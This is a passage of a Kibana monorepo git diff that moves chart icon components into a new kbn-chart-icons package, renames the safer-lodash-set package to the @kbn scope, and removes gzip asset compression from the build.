b/packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx @@ -8,11 +8,13 @@ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const VerticalBulletIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartVerticalBullet = ({ + title, + titleId, + ...props +}: Omit) => { return ( {title ? {title} : null} diff --git a/x-pack/plugins/lens/public/assets/chart_waffle.tsx b/packages/kbn-chart-icons/src/assets/chart_waffle.tsx similarity index 80% rename from x-pack/plugins/lens/public/assets/chart_waffle.tsx rename to packages/kbn-chart-icons/src/assets/chart_waffle.tsx index b9ee0557faea9..aeeca67a1a511 100644 --- a/x-pack/plugins/lens/public/assets/chart_waffle.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_waffle.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartWaffle = ({ title, titleId, ...props }: Omit) => ( +export const IconChartWaffle = ({ title, titleId, ...props }: Omit) => ( {title ? : null} diff --git a/packages/kbn-chart-icons/src/assets/common_styles.tsx b/packages/kbn-chart-icons/src/assets/common_styles.tsx new file mode 100644 index 0000000000000..21409b5cb6670 --- /dev/null +++ b/packages/kbn-chart-icons/src/assets/common_styles.tsx @@ -0,0 +1,23 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { css } from '@emotion/css'; +import { euiThemeVars } from '@kbn/ui-theme'; + +export const colors = { + subdued: css` + fill: ${euiThemeVars.euiTextSubduedColor}; + `, + accent: css` + fill: ${euiThemeVars.euiColorVis0}; + `, +}; + +export const noFill = css` + fill: none; +`; diff --git a/x-pack/plugins/lens/public/assets/drop_illustration.tsx b/packages/kbn-chart-icons/src/assets/drop_illustration.tsx similarity index 99% rename from x-pack/plugins/lens/public/assets/drop_illustration.tsx rename to packages/kbn-chart-icons/src/assets/drop_illustration.tsx index acd6d7bf31324..c35d46f48c758 100644 --- a/x-pack/plugins/lens/public/assets/drop_illustration.tsx +++ b/packages/kbn-chart-icons/src/assets/drop_illustration.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; import { EuiIconProps } from '@elastic/eui'; export const DropIllustration = ({ title, titleId, ...props }: Omit) => ( diff --git a/x-pack/plugins/lens/public/assets/globe_illustration.tsx b/packages/kbn-chart-icons/src/assets/globe_illustration.tsx similarity index 98% rename from x-pack/plugins/lens/public/assets/globe_illustration.tsx rename to packages/kbn-chart-icons/src/assets/globe_illustration.tsx index af2f2c7a48e46..b84d39705f632 100644 --- a/x-pack/plugins/lens/public/assets/globe_illustration.tsx +++ b/packages/kbn-chart-icons/src/assets/globe_illustration.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; import { EuiIconProps } from '@elastic/eui'; export const GlobeIllustration = ({ title, titleId, ...props }: Omit) => ( diff --git a/packages/kbn-chart-icons/src/assets/index.ts b/packages/kbn-chart-icons/src/assets/index.ts new file mode 100644 index 0000000000000..d3d2f968cdcc5 --- /dev/null +++ b/packages/kbn-chart-icons/src/assets/index.ts @@ -0,0 +1,42 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +export { IconCircle, IconTriangle } from './annotation_icons'; + +export { EuiIconAxisBottom } from './axis_bottom'; +export { EuiIconAxisLeft } from './axis_left'; +export { EuiIconAxisRight } from './axis_right'; +export { EuiIconAxisTop } from './axis_top'; + +export { IconChartArea } from './chart_area'; +export { IconChartAreaPercentage } from './chart_area_percentage'; +export { IconChartAreaStacked } from './chart_area_stacked'; +export { IconChartBar } from './chart_bar'; +export { IconChartBarAnnotations } from './chart_bar_annotations'; +export { IconChartBarHorizontal } from './chart_bar_horizontal'; +export { IconChartBarHorizontalPercentage } from './chart_bar_horizontal_percentage'; +export { IconChartBarHorizontalStacked } from './chart_bar_horizontal_stacked'; +export { IconChartBarPercentage } from './chart_bar_percentage'; +export { IconChartBarReferenceLine } from './chart_bar_reference_line'; +export { IconChartBarStacked } from './chart_bar_stacked'; +export { IconChartDatatable } from './chart_datatable'; +export { IconChartDonut } from './chart_donut'; +export { IconChartLine } from './chart_line'; +export { IconChartMetric } from './chart_metric'; +export { IconChartMixedXy } from './chart_mixed_xy'; +export { IconChartMosaic } from './chart_mosaic'; +export { IconChartPie } from './chart_pie'; +export { IconChartTreemap } from './chart_treemap'; +export { IconChartWaffle } from './chart_waffle'; +export { DropIllustration } from './drop_illustration'; +export { GlobeIllustration } from './globe_illustration'; +export { EuiIconLegend } from './legend'; +export { IconRegionMap } from './region_map'; +export { IconChartHeatmap } from './chart_heatmap'; +export { IconChartHorizontalBullet } from './chart_horizontal_bullet'; +export { IconChartVerticalBullet } from './chart_vertical_bullet'; diff --git a/x-pack/plugins/lens/public/assets/legend.tsx b/packages/kbn-chart-icons/src/assets/legend.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/legend.tsx rename to packages/kbn-chart-icons/src/assets/legend.tsx index cde39b222cdd4..ce1a8ef9dcbc4 100644 --- a/x-pack/plugins/lens/public/assets/legend.tsx +++ b/packages/kbn-chart-icons/src/assets/legend.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconLegend = ({ title, titleId, ...props }: { title: string; titleId: string }) => ( {title ? : null} diff --git a/src/plugins/charts/public/static/utils/index.ts b/packages/kbn-chart-icons/src/index.ts similarity index 89% rename from src/plugins/charts/public/static/utils/index.ts rename to packages/kbn-chart-icons/src/index.ts index efb6e72823d73..f279aa93de165 100644 --- a/src/plugins/charts/public/static/utils/index.ts +++ b/packages/kbn-chart-icons/src/index.ts @@ -6,4 +6,4 @@ * Side Public License, v 1. */ -export * from './transform_click_event'; +export * from './assets'; diff --git a/packages/kbn-shared-ux-services/tsconfig.json b/packages/kbn-chart-icons/tsconfig.json old mode 100755 new mode 100644 similarity index 76% rename from packages/kbn-shared-ux-services/tsconfig.json rename to packages/kbn-chart-icons/tsconfig.json index 789c6b3111115..1984d8ed8bbef --- a/packages/kbn-shared-ux-services/tsconfig.json +++ b/packages/kbn-chart-icons/tsconfig.json @@ -6,13 +6,14 @@ "emitDeclarationOnly": true, "outDir": "target_types", "rootDir": "src", - "stripInternal": false, "types": [ "jest", - "node" - ] + "node", + "react", + "@emotion/css/types" + ], }, "include": [ - "src/**/*" + "src/**/*", ] } diff --git a/packages/kbn-coloring/BUILD.bazel b/packages/kbn-coloring/BUILD.bazel index 4b20561e70c96..f266fe42a904d 100644 --- a/packages/kbn-coloring/BUILD.bazel +++ b/packages/kbn-coloring/BUILD.bazel @@ -41,7 +41,6 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "//packages/kbn-i18n", "//packages/kbn-i18n-react", - "//packages/kbn-shared-ux-storybook", "//packages/kbn-interpreter", "//packages/kbn-utility-types", "//packages/kbn-shared-ux-utility", @@ -65,7 +64,6 @@ RUNTIME_DEPS = [ TYPES_DEPS = [ "//packages/kbn-i18n:npm_module_types", "//packages/kbn-i18n-react:npm_module_types", - "//packages/kbn-shared-ux-storybook:npm_module_types", "//packages/kbn-interpreter:npm_module_types", "//packages/kbn-utility-types:npm_module_types", "//packages/kbn-shared-ux-utility:npm_module_types", diff --git a/packages/kbn-config/BUILD.bazel b/packages/kbn-config/BUILD.bazel index 13cff50a1a2d7..4eeda0470542c 100644 --- a/packages/kbn-config/BUILD.bazel +++ b/packages/kbn-config/BUILD.bazel @@ -30,7 +30,7 @@ NPM_MODULE_EXTRA_FILES = [ ] RUNTIME_DEPS = [ - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-config-schema", "//packages/kbn-logging", "//packages/kbn-logging-mocks", @@ -47,7 +47,7 @@ RUNTIME_DEPS = [ ] TYPES_DEPS = [ - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-config-schema:npm_module_types", "//packages/kbn-logging:npm_module_types", "//packages/kbn-logging-mocks:npm_module_types", diff --git a/packages/kbn-config/src/deprecation/apply_deprecations.ts b/packages/kbn-config/src/deprecation/apply_deprecations.ts index 9b0c409204414..09e8efcdbd011 100644 --- a/packages/kbn-config/src/deprecation/apply_deprecations.ts +++ b/packages/kbn-config/src/deprecation/apply_deprecations.ts @@ -7,7 +7,7 @@ */ import { cloneDeep } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { AddConfigDeprecation, ChangedDeprecatedPaths, diff --git a/packages/kbn-config/src/object_to_config_adapter.ts b/packages/kbn-config/src/object_to_config_adapter.ts index 6b68f71ea7399..ce186d7b02c34 100644 --- a/packages/kbn-config/src/object_to_config_adapter.ts +++ b/packages/kbn-config/src/object_to_config_adapter.ts @@ -7,7 +7,7 @@ */ import { cloneDeep, get, has } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { getFlattenedObject } from '@kbn/std'; import { Config, ConfigPath } from '.'; diff --git a/packages/kbn-config/src/raw/read_config.ts b/packages/kbn-config/src/raw/read_config.ts index 307ce4e4a0f95..1c842961838f2 100644 --- a/packages/kbn-config/src/raw/read_config.ts +++ b/packages/kbn-config/src/raw/read_config.ts @@ -9,7 +9,7 @@ import { readFileSync } from 'fs'; import { safeLoad } from 'js-yaml'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { isPlainObject } from 'lodash'; import { ensureDeepObject } from './ensure_deep_object'; diff --git a/packages/kbn-eslint-config/.eslintrc.js b/packages/kbn-eslint-config/.eslintrc.js index 97100635ac0ee..f2b6e93649cdd 100644 --- a/packages/kbn-eslint-config/.eslintrc.js +++ b/packages/kbn-eslint-config/.eslintrc.js @@ -123,6 +123,14 @@ module.exports = { to: '@kbn/kibana-utils-plugin/common', exact: true, }, + { + from: '@elastic/safer-lodash-set', + to: '@kbn/safer-lodash-set', + }, + { + from: '@elastic/apm-synthtrace', + to: '@kbn/apm-synthtrace', + }, ], ], diff --git a/packages/kbn-monaco/BUILD.bazel b/packages/kbn-monaco/BUILD.bazel index a2cf0a1bdd92f..dc3acd1c20997 100644 --- a/packages/kbn-monaco/BUILD.bazel +++ b/packages/kbn-monaco/BUILD.bazel @@ -32,11 +32,11 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "//packages/kbn-babel-preset", "//packages/kbn-i18n", + "@npm//@babel/runtime", "@npm//antlr4ts", "@npm//babel-loader", "@npm//monaco-editor", "@npm//raw-loader", - "@npm//regenerator-runtime", "@npm//rxjs", ] diff --git a/packages/kbn-monaco/src/painless/worker/painless.worker.ts b/packages/kbn-monaco/src/painless/worker/painless.worker.ts index 1ccde6ff45c72..e03d6b5ed7f34 100644 --- a/packages/kbn-monaco/src/painless/worker/painless.worker.ts +++ b/packages/kbn-monaco/src/painless/worker/painless.worker.ts @@ -9,7 +9,7 @@ // This module is intended to be run inside of a webworker /* eslint-disable @kbn/eslint/module_migration */ -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; // @ts-ignore import * as worker from 'monaco-editor/esm/vs/editor/editor.worker'; import { monaco } from '../../monaco_imports'; diff --git a/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts b/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts index df5a91f8b316d..b57514f70fca1 100644 --- a/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts +++ b/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts @@ -9,7 +9,7 @@ // Please note: this module is intended to be run inside of a webworker. /* eslint-disable @kbn/eslint/module_migration */ -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; // @ts-ignore import * as worker from 'monaco-editor/esm/vs/editor/editor.worker'; import { XJsonWorker } from './xjson_worker'; diff --git a/packages/kbn-optimizer/limits.yml b/packages/kbn-optimizer/limits.yml index 2a116d9ab60ed..6c95efdba7330 100644 --- a/packages/kbn-optimizer/limits.yml +++ b/packages/kbn-optimizer/limits.yml @@ -70,7 +70,7 @@ pageLoadAssetSize: visTypeTimeseries: 55203 visTypeVega: 153573 visTypeVislib: 242838 - visTypeXy: 113478 + visTypeXy: 30000 visualizations: 90000 watcher: 43598 runtimeFields: 41752 @@ -119,7 +119,6 @@ pageLoadAssetSize: expressionGauge: 25000 controls: 40000 expressionPartitionVis: 26338 - sharedUX: 16225 savedSearch: 16225 ux: 20784 sessionView: 77750 diff --git a/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts b/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts index e83fb083e9868..6c69a935184e6 100644 --- a/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts +++ b/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts @@ -261,9 +261,4 @@ const expectFileMatchesSnapshotWithCompression = (filePath: string, snapshotLabe Fs.readFileSync(Path.resolve(MOCK_REPO_DIR, `${filePath}.br`)) ).toString() ).toEqual(raw); - - // Verify the gzip variant matches - expect( - Zlib.gunzipSync(Fs.readFileSync(Path.resolve(MOCK_REPO_DIR, `${filePath}.gz`))).toString() - ).toEqual(raw); }; diff --git a/packages/kbn-optimizer/src/worker/webpack.config.ts b/packages/kbn-optimizer/src/worker/webpack.config.ts index ccc99a8a42671..1b87498496b24 100644 --- a/packages/kbn-optimizer/src/worker/webpack.config.ts +++ b/packages/kbn-optimizer/src/worker/webpack.config.ts @@ -282,12 +282,6 @@ export function getWebpackConfig(bundle: Bundle, bundleRefs: BundleRefs, worker: level: 11, }, }), - new CompressionPlugin({ - algorithm: 'gzip', - filename: '[path].gz', - test: /\.(js|css)$/, - cache: false, - }), ], optimization: { diff --git a/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts b/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts index 9df98159c4e4d..10ad022e45a79 100644 --- a/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts +++ b/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts @@ -95,10 +95,8 @@ it('builds a generated plugin into a viable archive', async () => { "kibana/fooTestPlugin/server/types.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js.br", - "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js.gz", "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js.br", - "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js.gz", "kibana/fooTestPlugin/translations/ja-JP.json", "kibana/fooTestPlugin/tsconfig.json", ] diff --git a/packages/elastic-safer-lodash-set/.gitignore b/packages/kbn-safer-lodash-set/.gitignore similarity index 100% rename from packages/elastic-safer-lodash-set/.gitignore rename to packages/kbn-safer-lodash-set/.gitignore diff --git a/packages/elastic-safer-lodash-set/.npmignore b/packages/kbn-safer-lodash-set/.npmignore similarity index 100% rename from packages/elastic-safer-lodash-set/.npmignore rename to packages/kbn-safer-lodash-set/.npmignore diff --git a/packages/elastic-safer-lodash-set/BUILD.bazel b/packages/kbn-safer-lodash-set/BUILD.bazel similarity index 92% rename from packages/elastic-safer-lodash-set/BUILD.bazel rename to packages/kbn-safer-lodash-set/BUILD.bazel index 4a1c8b4290f33..893719c822859 100644 --- a/packages/elastic-safer-lodash-set/BUILD.bazel +++ b/packages/kbn-safer-lodash-set/BUILD.bazel @@ -1,7 +1,7 @@ load("@build_bazel_rules_nodejs//:index.bzl", "js_library", "pkg_npm") -PKG_BASE_NAME = "elastic-safer-lodash-set" -PKG_REQUIRE_NAME = "@elastic/safer-lodash-set" +PKG_BASE_NAME = "kbn-safer-lodash-set" +PKG_REQUIRE_NAME = "@kbn/safer-lodash-set" SOURCE_FILES = glob( [ diff --git a/packages/elastic-safer-lodash-set/LICENSE b/packages/kbn-safer-lodash-set/LICENSE similarity index 95% rename from packages/elastic-safer-lodash-set/LICENSE rename to packages/kbn-safer-lodash-set/LICENSE index bae69c938a74c..8c34c9393aec7 100644 --- a/packages/elastic-safer-lodash-set/LICENSE +++ b/packages/kbn-safer-lodash-set/LICENSE @@ -31,4 +31,4 @@ individuals. For exact contribution history, see the revision history available at the following locations: - https://github.com/lodash/lodash - https://github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/lodash - - https://github.com/elastic/kibana/tree/main/packages/elastic-safer-lodash-set + - https://github.com/elastic/kibana/tree/main/packages/kbn-safer-lodash-set diff --git a/packages/elastic-safer-lodash-set/README.md b/packages/kbn-safer-lodash-set/README.md similarity index 86% rename from packages/elastic-safer-lodash-set/README.md rename to packages/kbn-safer-lodash-set/README.md index aae17b35ac130..08df12ff01ec3 100644 --- a/packages/elastic-safer-lodash-set/README.md +++ b/packages/kbn-safer-lodash-set/README.md @@ -1,4 +1,4 @@ -# @elastic/safer-lodash-set +# @kbn/safer-lodash-set This module adds protection against prototype pollution to the [`set`] and [`setWith`] functions from [Lodash] and are API compatible with @@ -23,15 +23,15 @@ console.log(object.x[0].y.z); // => 5 The main module exposes two functions, `set` and `setWith`: ```js -const { set, setWith } = require('@elastic/safer-lodash-set'); +const { set, setWith } = require('@kbn/safer-lodash-set'); ``` Besides the main module, it's also possible to require each function individually: ```js -const set = require('@elastic/safer-lodash-set/set'); -const setWith = require('@elastic/safer-lodash-set/setWith'); +const set = require('@kbn/safer-lodash-set/set'); +const setWith = require('@kbn/safer-lodash-set/setWith'); ``` The APIs of these functions are identical to the equivalent Lodash @@ -44,15 +44,15 @@ This module also supports the `lodash/fp` api and hence exposes the following fp compatible functions: ```js -const { set, setWith } = require('@elastic/safer-lodash-set/fp'); +const { set, setWith } = require('@kbn/safer-lodash-set/fp'); ``` Besides the main fp module, it's also possible to require each function individually: ```js -const set = require('@elastic/safer-lodash-set/fp/set'); -const setWith = require('@elastic/safer-lodash-set/fp/setWith'); +const set = require('@kbn/safer-lodash-set/fp/set'); +const setWith = require('@kbn/safer-lodash-set/fp/setWith'); ``` ## Limitations diff --git a/packages/elastic-safer-lodash-set/fp/assoc.d.ts b/packages/kbn-safer-lodash-set/fp/assoc.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/assoc.d.ts rename to packages/kbn-safer-lodash-set/fp/assoc.d.ts index c04c85f63a870..45e5800a3a33b 100644 --- a/packages/elastic-safer-lodash-set/fp/assoc.d.ts +++ b/packages/kbn-safer-lodash-set/fp/assoc.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { assoc } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/assoc.js b/packages/kbn-safer-lodash-set/fp/assoc.js similarity index 76% rename from packages/elastic-safer-lodash-set/fp/assoc.js rename to packages/kbn-safer-lodash-set/fp/assoc.js index 851e11690ea35..d6ea0c9c74b77 100644 --- a/packages/elastic-safer-lodash-set/fp/assoc.js +++ b/packages/kbn-safer-lodash-set/fp/assoc.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/assocPath.d.ts b/packages/kbn-safer-lodash-set/fp/assocPath.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/assocPath.d.ts rename to packages/kbn-safer-lodash-set/fp/assocPath.d.ts index 534128331f142..334c21ca7e707 100644 --- a/packages/elastic-safer-lodash-set/fp/assocPath.d.ts +++ b/packages/kbn-safer-lodash-set/fp/assocPath.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { assocPath } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/assocPath.js b/packages/kbn-safer-lodash-set/fp/assocPath.js similarity index 76% rename from packages/elastic-safer-lodash-set/fp/assocPath.js rename to packages/kbn-safer-lodash-set/fp/assocPath.js index 851e11690ea35..d6ea0c9c74b77 100644 --- a/packages/elastic-safer-lodash-set/fp/assocPath.js +++ b/packages/kbn-safer-lodash-set/fp/assocPath.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/index.d.ts b/packages/kbn-safer-lodash-set/fp/index.d.ts similarity index 99% rename from packages/elastic-safer-lodash-set/fp/index.d.ts rename to packages/kbn-safer-lodash-set/fp/index.d.ts index fcd7ff01e3cc8..777c7c0df980a 100644 --- a/packages/elastic-safer-lodash-set/fp/index.d.ts +++ b/packages/kbn-safer-lodash-set/fp/index.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import lodash = require('lodash'); diff --git a/packages/elastic-safer-lodash-set/fp/index.js b/packages/kbn-safer-lodash-set/fp/index.js similarity index 81% rename from packages/elastic-safer-lodash-set/fp/index.js rename to packages/kbn-safer-lodash-set/fp/index.js index 7d9cdb099dfd7..aea3e4600d7c6 100644 --- a/packages/elastic-safer-lodash-set/fp/index.js +++ b/packages/kbn-safer-lodash-set/fp/index.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ exports.set = exports.assoc = exports.assocPath = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/set.d.ts b/packages/kbn-safer-lodash-set/fp/set.d.ts similarity index 79% rename from packages/elastic-safer-lodash-set/fp/set.d.ts rename to packages/kbn-safer-lodash-set/fp/set.d.ts index b676d271e0556..3e5730bb1ec42 100644 --- a/packages/elastic-safer-lodash-set/fp/set.d.ts +++ b/packages/kbn-safer-lodash-set/fp/set.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { set } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/set.js b/packages/kbn-safer-lodash-set/fp/set.js similarity index 84% rename from packages/elastic-safer-lodash-set/fp/set.js rename to packages/kbn-safer-lodash-set/fp/set.js index 0fb48694d736d..3a54fcacec959 100644 --- a/packages/elastic-safer-lodash-set/fp/set.js +++ b/packages/kbn-safer-lodash-set/fp/set.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /*eslint no-var:0 */ diff --git a/packages/elastic-safer-lodash-set/fp/setWith.d.ts b/packages/kbn-safer-lodash-set/fp/setWith.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/setWith.d.ts rename to packages/kbn-safer-lodash-set/fp/setWith.d.ts index 812437adc165a..20eadd898fa52 100644 --- a/packages/elastic-safer-lodash-set/fp/setWith.d.ts +++ b/packages/kbn-safer-lodash-set/fp/setWith.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { setWith } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/setWith.js b/packages/kbn-safer-lodash-set/fp/setWith.js similarity index 84% rename from packages/elastic-safer-lodash-set/fp/setWith.js rename to packages/kbn-safer-lodash-set/fp/setWith.js index e477d4b4bc7ba..9842e1ecf93b2 100644 --- a/packages/elastic-safer-lodash-set/fp/setWith.js +++ b/packages/kbn-safer-lodash-set/fp/setWith.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /*eslint no-var:0 */ diff --git a/packages/elastic-safer-lodash-set/index.d.ts b/packages/kbn-safer-lodash-set/index.d.ts similarity index 96% rename from packages/elastic-safer-lodash-set/index.d.ts rename to packages/kbn-safer-lodash-set/index.d.ts index aaff01f11a7af..198df549e0704 100644 --- a/packages/elastic-safer-lodash-set/index.d.ts +++ b/packages/kbn-safer-lodash-set/index.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ export = SaferLodashSet; diff --git a/packages/elastic-safer-lodash-set/index.js b/packages/kbn-safer-lodash-set/index.js similarity index 80% rename from packages/elastic-safer-lodash-set/index.js rename to packages/kbn-safer-lodash-set/index.js index d9edb25476c12..9ed12a77aa163 100644 --- a/packages/elastic-safer-lodash-set/index.js +++ b/packages/kbn-safer-lodash-set/index.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ exports.set = require('./lodash/set'); diff --git a/packages/elastic-safer-lodash-set/lodash/_baseSet.js b/packages/kbn-safer-lodash-set/lodash/_baseSet.js similarity index 96% rename from packages/elastic-safer-lodash-set/lodash/_baseSet.js rename to packages/kbn-safer-lodash-set/lodash/_baseSet.js index f2ac3351b5afa..be037ecc344b9 100644 --- a/packages/elastic-safer-lodash-set/lodash/_baseSet.js +++ b/packages/kbn-safer-lodash-set/lodash/_baseSet.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /* eslint-disable one-var,prettier/prettier,no-var,eqeqeq,no-nested-ternary */ diff --git a/packages/elastic-safer-lodash-set/lodash/set.js b/packages/kbn-safer-lodash-set/lodash/set.js similarity index 94% rename from 